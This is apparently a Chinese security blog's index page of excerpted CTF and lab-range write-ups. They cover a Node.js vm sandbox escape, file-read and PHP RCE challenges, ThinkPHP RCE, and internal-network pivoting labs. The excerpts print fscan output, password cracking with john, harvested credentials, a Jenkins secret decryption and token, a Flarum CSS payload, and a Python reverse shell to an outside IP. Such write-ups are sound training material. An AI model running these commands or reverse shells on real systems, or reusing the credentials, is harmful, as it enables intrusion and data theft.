晴川's Blog🌈

本篇文章转载自：https://zer0peach.github.io/2023/11/20/vm%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8%E5%88%9D%E8%AF%86/#vm2-2 沙箱逃逸初识https://xz.aliyun.com/t/11859#toc-0 几乎是复现这篇文章，写文章是为了督促自己学习，顺便保存到本地 概念nodejs是javascript的运行环境，简单来说写在后端的javascript叫做nodejs 沙箱在我看来就是开创一个独立空间来运行有害的代码，从而避免影响到主机的功能 nodejs通过vm模块来创建一个沙箱 node将字符串执行为代码age.txt 1var age = 18 1.js 12345678910const fs = require("fs");let y1 = fs.readFileSync('age.txt','utf-8');console.log(y1);eval(y1);console.log(age);##var age=18 ...

国城杯wpEz_Gallery密码爆破，验证码不用变 admin/123456 登录成功之后发现 任意一幅画file参数存在任意文件读取 之前好像做过类似的 攻防世界的catcat-new 获取当前启动进程的完整命令 1/proc/self/cmdline 获取到当前页面的运行路径 1/app/app.py 读取响应文件，得到源码 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119from pyramid.config import Configuratorfrom pyramid.httpexceptions import H ...

2024极客大挑战wp(部分)rce_me12345678910111213141516171819202122232425262728293031323334353637383940 <?phpheader("Content-type:text/html;charset=utf-8");highlight_file(__FILE__);error_reporting(0);# Can you RCE me?if (!is_array($_POST["start"])) { if (!preg_match("/start.*now/is", $_POST["start"])) { if (strpos($_POST["start"], "start now") === false) { die("Well, you haven't started.<br>&q ...

[ISITDTU 2019]EasyPHP123456789101112 <?phphighlight_file(__FILE__);$_ = @$_GET['_'];if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) ) die('rosé will not do it');if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd ) die('you are so close, omg');eval($_);?> 过滤的挺新颖啊 1preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) 分解一下 过滤了ASII码\00到空格的字符，0-9数字，’”$&.|[{,_defgops：匹配这些字符中的 ...

GreatWallflag01ThinkPHP5 RCE（flag01）ThinkPHP v5.0.23 命令执行 fsan开扫一下 奇怪39开头的我没扫出来，重开了一个8开头的就扫出来了（校园网的问题（ 根目录找到flag01 flag02上frp和fscan 12345678910111213141516171819202122232425172.28.23.17:22 open172.28.23.17:80 open172.28.23.17:8080 open[*] WebTitle http://172.28.23.17 code:200 len:10887 title:""[*] WebTitle http://172.28.23.17:8080 code:200 len:1027 title:Login Form[+] PocScan http://172.28.23.17:8080 poc-yaml-thinkphp5023-method-rce poc1172.28.23.26:80 open172.28.23.17:8 ...

春秋云境-TunnelX2024.11.21记 重新配环境已经不知道多少次了，内心已经有些崩溃了，卡在了DNS隧道搭建上了，传上去iodine后nohup后，在本机执行iodined迟迟等不来dns请求，查不清楚是什么原因，唉。。先暂时放下一段时间吧 2025.1.9记 完结撒花了，这个靶场前前后后打了10个小时，这DNS隧道可是给我印象深刻，我中途换了个服务器也不行，后面配置了安全组，就可以了，大概率是安全组的问题，需要设置好出和入配置都开放53端口。 纪念一下吧 flag01第一次打的靶场上来给了俩ip，扫了端口 开了2121的ftp，80端口 扫目录发现是SiteServer CMS6.15.51 ftp存在未授权访问 xftp连上，发现secret.7z 下载解压需要密码 爆破一下 1237z2john secret.7z >1.txtjohn 1.txt --wordlist=./rockyou.txt7z x secret.7z 嘶~爆的有点小慢 爆的密码为13131313 内容为 A strange character string, You’r ...

{AQAAABAAAAAgvBTIIfz3QQnmD8y+ncKsVDqTEsdqjxdp/rkK9tRPkckOfP9xBtu6uqckTjQJ6gJj} 12println(hudson.util.Secret.fromString("{AQAAABAAAAAgvBTIIfz3QQnmD8y+ncKsVDqTEsdqjxdp/rkK9tRPkckOfP9xBtu6uqckTjQJ6gJj}").getPlainText()) 12glpat-bGEgHAJDvwaPP78rsLeS

春秋云境-Flarumflag01fscan 扫一扫 就一个网站，结合题目描述要测试弱口令 爆破弱口令，burp导入rockyou老是卡，第一次用yakit爆破 administrator/1chris 进入后台管理 外观设置 选择自定义样式插入CSS 1@import (inline) 'data:text/css;base64,dGVzdC50eHQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAwMDA2NDQAAAAAAAAAAAAAAAAAAAAAADAwMDAwMDAwMDA0ADAwMDAwMDAwMDAwADAwMDYyMTcgMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...

春秋云境-ThermalPowerflag01fscan开扫 蚁剑马写进去连不上，选择冰蝎马 flag02 发现ftp可连接，新主机 1172.22.17.6 WORKGROUP\WIN-ENGINEER 上代理 挨个看看发现敏感信息 123WIN-SCADA: 172.22.26.xxUsername: AdministratorPassword: IYnT3GyCiy3 结合内部通知可推断出登录账号密码为 账户名+@+工号 chenhua/chenhua@0813zhaoli/zhaoli@0821wangning/wangning@0837zhangling/zhangling@0871zhangying/zhangying@0888wangzhiqiang/wangzhiqiang@0901chentao/chentao@0922zhouyong/zhouyong@0939lilong/lilong@1046liyumei/liyumei@1048 ...

春秋云境-Hospitalflag01 存在actuator接口泄露 发现存在堆栈文件heapdump 不理解我用heapdump找出来的多一个G GAysjAQhG7/sDKQlVpR2g== 1GAYysgMQhG7/CzIJlVpR2g== 12345678find / -perm -u=s -type f 2>/dev/nullpython3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("124.222.136.33",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'python3 -c 'import pty; pty.spawn("/bin/ba ...